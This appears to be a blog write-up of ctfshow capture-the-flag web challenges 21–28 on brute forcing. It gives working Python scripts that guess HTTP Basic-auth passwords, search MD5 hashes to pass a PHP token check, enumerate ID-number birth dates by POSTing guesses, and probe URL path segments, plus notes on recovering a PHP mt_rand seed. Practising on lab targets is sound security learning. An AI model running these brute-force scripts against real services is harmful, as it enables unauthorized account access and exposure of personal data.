ctfshow Web Basics - Brute Force


web21

Capturing the request shows the credentials are sent Base64-encoded (HTTP Basic auth), so write a Python script to run through the wordlist.

import base64
import time

import requests

url = 'http://8ae34bab-0586-4bd7-8f4a-3fcef2e95cc8.challenge.ctf.show:8080/'

# Try each password from the wordlist as "admin:<password>" over HTTP Basic auth
with open("payload.txt", 'r') as a:
    for i in a:
        # print(i,end="")
        x = i.replace("\n", "")
        # Basic auth sends "user:password" Base64-encoded, not encrypted
        j = base64.b64encode(("admin:" + x).encode('utf-8')).decode('utf-8')
        print(j)
        header = {
            'Authorization': 'Basic %s' % j
        }
        res = requests.get(url, headers=header)
        # print(requests.get(url,headers = header).text)
        # The challenge page repeats this prompt while authentication fails
        if res.text.find("需要用户名和密码才能继续访问") == -1:
            print("密码已找到:" + x)  # "password found"
            # print(requests.get(url,headers = header).text)
            break
        else:
            print("密码错误:" + x)  # "wrong password"
        time.sleep(0.2)

# Confirm the recovered password by sending it once more and printing the page
j = base64.b64encode("admin:shark13".encode('utf-8')).decode('utf-8')
print(j)
header = {
    'Authorization': 'Basic %s' % j
}
print(requests.get(url, headers=header).text)

web22

Nothing yet.

web23

Analyse the source code once you have it.

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 11:43:51
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

As you can see, the token is first MD5-hashed and then its 2nd, 15th and 18th characters are compared for equality. Note that the integer value of that 2nd character ends up in the denominator, so all we need is a hash whose 32nd character has integer value 3 and whose 2nd character is a non-zero digit. Write a Python script to search for one.

import hashlib

def toint(m):
    # Mimic PHP intval() on a single hex character: digits keep their value,
    # letters become 0
    if ord(m) <= 57 and ord(m) >= 48:
        return ord(m) - 48
    else:
        return 0

# Try every two-character token from the printable ASCII range
for x in range(33, 127):
    for y in range(33, 127):
        token = chr(x) + chr(y)
        m = hashlib.md5(token.encode('utf-8')).hexdigest()
        # 2nd, 15th and 18th hex characters must be equal (PHP offsets 1, 14, 17)
        if m[1:2] == m[14:15] and m[14:15] == m[17:18]:
            # (d+d+d)/d === intval(32nd char) holds only when d is a non-zero
            # digit and the 32nd character is 3
            if toint(m[31:32]) == 3 and toint(m[1:2]) != 0:
                print(token)


web24

Take the random seed, try it yourself to get the first random number, and pass that in as the parameter.

web25

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:56:57
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
?>

Analyse the code: first request ?r=0 to obtain the first random number (the page echoes intval($r) - mt_rand(), i.e. its negation), then feed it into php_mt_seed to brute-force the seed, take the first three candidate seeds and plug them back in to get
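As an added example (not part of the original write-up), here is a Python re-implementation of PHP 7.1+ mt_srand()/mt_rand(): once the seed is known, every later mt_rand() value is reproducible, which is why the web25 check `token == mt_rand()+mt_rand()` offers no real secrecy and why tokens should come from a CSPRNG such as random_bytes()/random_int(). The PHP version (7.1 or later, standard MT19937 twist) and the demo seed of 1 are assumptions.

```python
N, M = 624, 397
MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF


class PhpMtRand:
    """MT19937 as used by PHP >= 7.1 mt_srand()/mt_rand() (assumed version)."""

    def __init__(self, seed):
        # php_mt_initialize(): same recurrence as the reference init_genrand()
        self.state = [seed & 0xFFFFFFFF] + [0] * (N - 1)
        for i in range(1, N):
            prev = self.state[i - 1]
            self.state[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = N  # force a reload on the first draw, like php_mt_srand()

    def _reload(self):
        # Standard MT19937 twist; PHP < 7.1 used a variant that is not modelled here
        s = self.state
        for i in range(N):
            y = (s[i] & UPPER) | (s[(i + 1) % N] & LOWER)
            s[i] = s[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.index = 0

    def mt_rand(self):
        """Equivalent of PHP mt_rand() with no arguments: tempered output >> 1."""
        if self.index >= N:
            self._reload()
        y = self.state[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return (y & 0xFFFFFFFF) >> 1


def web25_values(seed):
    """Reproduce what web25 derives from a known seed: the value that makes
    intval($r) - mt_rand() zero, and the cookie token it then expects."""
    g = PhpMtRand(seed)
    first = g.mt_rand()                 # ?r=<first> passes the $rand check
    token = g.mt_rand() + g.mt_rand()   # $_COOKIE['token'] must equal this sum
    return first, token


if __name__ == "__main__":
    # Constructed demo seed; the challenge derives its seed from md5($flag)
    print(web25_values(1))  # first value is 895547922 on PHP 7.1+
```

The same class can be seeded with each candidate seed reported by php_mt_seed to check which one reproduces the observed value.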

web26

Capture the request in Chrome, then send empty parameters.

web27

Open the admission list and use it to construct the ID card number.

Capture the request, then build the query and brute-force the unknown digits.

import time

import requests

url = 'http://0b797204-18d0-4296-90e3-f36aa2191111.challenge.ctf.show:8080/info/checkdb.php'
# ID number template: area code and tail digits are known, the birth date (YYYYMMDD) is not
fmt = '621022%04d%02d%02d5237'
for i in range(1990, 1991):
    for j in range(1, 13):
        for k in range(1, 32):
            # print(fmt%(i,j,k))
            temp = fmt % (i, j, k)
            data = {
                "a": "高先伊",
                "p": temp,
            }
            res = requests.post(url, data=data)
            # the server answers with "error" for a wrong ID number
            if res.text.find("error") == -1:
                print(temp)
                exit()
            else:
                print("error", temp)
            time.sleep(0.2)

web28

Looking at the URL shows the two path segments can be brute-forced, so write a script to do it.

import requests

# Two numeric path segments, each assumed to lie in 0..100
url = 'http://b6a7edd3-c1f1-4a06-b898-a1187dd11bad.challenge.ctf.show:8080/%s/%s/index.php'
for i in range(101):
    for j in range(101):
        temp = url % (i, j)
        res = requests.get(temp)
        # only the correct directory pair returns HTTP 200
        if res.status_code == 200:
            print(res.text)
            exit()
        else:
            print("error", temp)

Author: Rolemee
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee as the source when reposting!